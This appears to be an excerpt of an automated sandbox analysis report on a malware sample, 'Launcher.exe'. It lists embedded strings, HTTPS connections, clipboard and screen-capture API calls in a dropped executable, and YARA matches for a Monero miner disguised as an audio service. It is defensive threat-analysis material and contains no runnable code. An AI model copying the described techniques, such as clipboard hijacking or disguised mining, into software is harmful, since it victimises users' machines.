                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1562259858.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: Launcher.exe, 00000000.00000003.1245725904.0000000009DF1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_03AD1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0043F276 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject
Source: Yara match | File source: 56.3.svchost.exe.55e0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 56.3.svchost.exe.53c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 56.3.svchost.exe.55e0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.3.wxymrnibweqciwn.exe.2e40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.3.wxymrnibweqciwn.exe.2c20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001E.00000003.1864045584.0000000002C20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000003.1864232126.0000000002E40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000003.1876706321.00000000053C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000003.1876984046.00000000055E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: dump.pcap, type: PCAP | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000040.00000000.1979728835.00007FF7283B4000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: wxymrnibweqciwn.exe.0.dr | Static PE information: section name: (empty)
Source: wxymrnibweqciwn.exe.0.dr | Static PE information: section name: (empty)
Source: wxymrnibweqciwn.exe.0.dr | Static PE information: section name: (empty)
Source: wxymrnibweqciwn.exe.0.dr | Static PE information: section name: (empty)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (empty)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (empty)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (empty)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (empty)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (empty)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (empty)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (empty)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (empty)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (empty)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (empty)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (empty)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (empty)
Source: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Launcher.exe | Code function: 0_3_0A1F31DC
Source: C:\Users\user\Desktop\Launcher.exe | Code function: 0_3_0A1F2790
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E6460
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0020A4C0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A553B
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A7B00
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E4CB0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C1F50
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F6010
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0020A030
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A1000
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001AE030
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001CE020
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FC050
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DD070
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FD070
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E6090
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0020B0F0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001BA0F0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F90F0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FE0F0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B50E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C00E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D0110
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F4110
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D8130
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B9150
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D7170
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001BF190
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B01A0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A41D0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_002041D0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00218230
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C3200
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00202210
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001AD250
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E0240
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C5290
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_002012B0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B82B0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_002122CA
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A72E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A8310
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001BB310
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00203330
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001AA300
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001CD330
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C7320
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E1320
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001EA350
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F0350
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FC350
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C9360
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FD3B0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001BE3A0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D53A0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_002093E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E93D0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001CA3F0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00208420
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001BD410
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D6410
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B0430
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B4430
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F3430
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B2450
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C5450
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001CE490
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F84C0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B3510
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B6530
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C3530
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FF530
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F9576
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DB560
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00225592
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DC5A0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DF5D0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C55C0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001CB5F0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_002095D0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001AC610
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00201630
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F7630
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B0620
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E9650
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00204640
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E1660
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FA660
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001AE690
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F5690
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001CC6D0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B76C0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001AB6F0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C66F0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DD6E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D86E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A9718
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001AA700
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F5700
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00223718
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B9740
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001AD7F0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F07F0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001BD810
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DA810
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00202800
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A5856
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B3840
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DC870
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001BF860
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C98A0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E78A0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C28C0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001BE900
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001AC906
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D8900
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0020D90A
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F6920
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B6940
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001AB960
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A8990
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FD980
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B89A0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DE9C0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00203A20
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F1A00
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001CCA30
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001CDA30
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D3A50
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FBA40
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E8A70
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C3A90
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00207AB0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B7AA0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D8AA0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A9AF6
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001ACB0F
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B7B50
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001EEB40
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B0B90
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001BDB80
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F7BB0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B1BA0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001CABF0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DABF0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B4C10
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C2C00
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00201C00
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D3C70
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C9D00
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FFD00
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A9D30
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DFD20
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00203D60
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C2D80
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DDD80
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DDDD9
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A8DD0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001D7DD0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001A5DF6
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E7DF0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B0DE0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C0E10
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_00207E10
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001CFE20
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001ADE60
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E2E80
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FAE80
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C5EB0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E3EA0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001DAEC0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001EAEE0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001ABF10
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C2F10
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FEF10
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001B3F20
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001E6F90
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001FFF90
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001C6FC0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_001F2FC0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_001BD810
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_001DA810
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_001F6010
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_001A1000
